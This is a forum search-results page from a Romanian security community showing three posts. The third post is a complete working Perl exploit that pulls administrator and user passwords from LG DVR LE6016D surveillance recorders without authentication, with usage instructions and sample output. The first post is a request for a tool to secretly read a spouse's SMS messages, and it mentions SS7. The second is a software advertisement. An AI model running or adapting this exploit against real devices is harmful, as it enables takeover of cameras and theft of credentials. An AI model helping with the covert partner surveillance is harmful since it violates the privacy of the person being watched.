Jump to content

Search the Community

Showing results for tags 'programs'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 3 results

  1. Buna tuturor! SOTUL MĂ ÎNȘEALĂ ! Am ajuns într-un moment foarte dureros din viata mea. Am o căsnicie cu soțul meu de 10 ani, iar de 2 ani de zile lucrează in străinătate si simt ma înșeală. Ma poate ajuta cnv cu un program de citire a sms-urilor in timp real?Am citit despre ss7, dar mi se pare foarte complicat.Stie cineva o alternativă ??? Va rog ajutati-ma .multumesc
  2. Product Description Your hard disk could be faster! Normal tasks like copying files or opening images takes you ages? SuperEasy Live Defrag is your hard disk professional that cleans your hard disk fully automatically and restores performance immediately. Why SuperEasy Live Defrag? You have the impression that your PC gets slower and slower? SuperEasy Live Defrag helps your hard disk find information faster and cleans the hard disk so that access times are reduced dramatically. The program relieves you of all the work and automatically ensures that no more fragmentation occurs. Functions at a glance Fully automatic background monitoring Real-time hard disk analysis Easy and uncomplicated operation Weekly statistics Expanded options for advanced users Energy check for notebooks SSD-hard disk protection Timer for defragmentation tasks Intelligent, resource-saving algorithm Simultaneous defragmentation of several hard disks Support for external USB hard disks Full RAID hard disk support Instant results Accelerates the opening of files, images, videos and music Removes fragmentation Accelerates the packing and unpacking of files Accelerates video editing Accelerates the start of your PC Accelerates copy procedures Top reasons for SuperEasy What you get with every SuperEasy program Repeatedly awarded software Computer magazines and experts worldwide recommend our programs. Useful software SuperEasy programs “made in Germany” meet the highest quality demands. 1-click technology Thanks to intelligent automatism you get results with but a few clicks. Easiest operation No previous knowledge required for operating the software. Free support Registered users get free E-mail support. High satisfaction Customers in more than 81 countries already use our programs. Free updates Users of our programs get program updates free of charge. Guaranteed virus-free All SuperEasy programs are 100% safe and virus-free. Product Homepage Here -> Download <-Deal Expires in: EXPIRED!
  3. #!/usr/bin/perl # # LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # # # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ #### # # Digital video recorder (DVR) surveillance is the use of cameras, # often hidden or concealed, that use DVR technology to record # video for playback or immediate viewing. As technological # innovations have made improvements in the security and # surveillance industry, DVR surveillance has become more # prominent and allows for easier and more versatile security # systems in homes and businesses. A DVR surveillance security # system can be designed for indoor use or outdoor use and can # often involve hidden security cameras, concealed “nanny cams” # for home security, and even personal recording devices hidden # on a person. # #### # # Description: # No authentication (login) is required to exploit this vulnerability. # This program demonstrates how unpatched security bug would enable # hackers to gain control of a vulnerable device while sitting # behind their keyboard, potentially thousands of miles away. # An unauthenticated attacker that is connected to the DVR's may be # able to retrieve the device's administrator password allowing them # to directly access the device's configuration control panel. # #### # # Disclaimer: # This or previous programs is for Educational purpose ONLY. Do not # use it without permission.The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # #### # Use them at your own risk! #### # # $ perl lg.pl 133.7.133.7:80 # LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # u/p: admin/000000 # u/p: user1/000000 # u/p: user2/000000 # u/p: user3/000000 # u/p: LOGOUT/000000 # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # #### use LWP::Simple; print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n"; if (@ARGV == 0) {&usg; &foot;} while (@ARGV > 0) { $t = shift(@ARGV); } my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!"); for (my $i=0; $i <= 4; $i++){ if ($r =~ m/<name>(.*)<\/name>/g){ print " u\/p: $1\/"; } if ($r =~ m/<pw>(.*)<\/pw>/g){ print "$1\n"; } } &foot; sub usg(){ print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n"; } sub foot(){ print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n"; print " http://www.ethical-hacker.org/\n"; exit; } Source
×
×
  • Create New...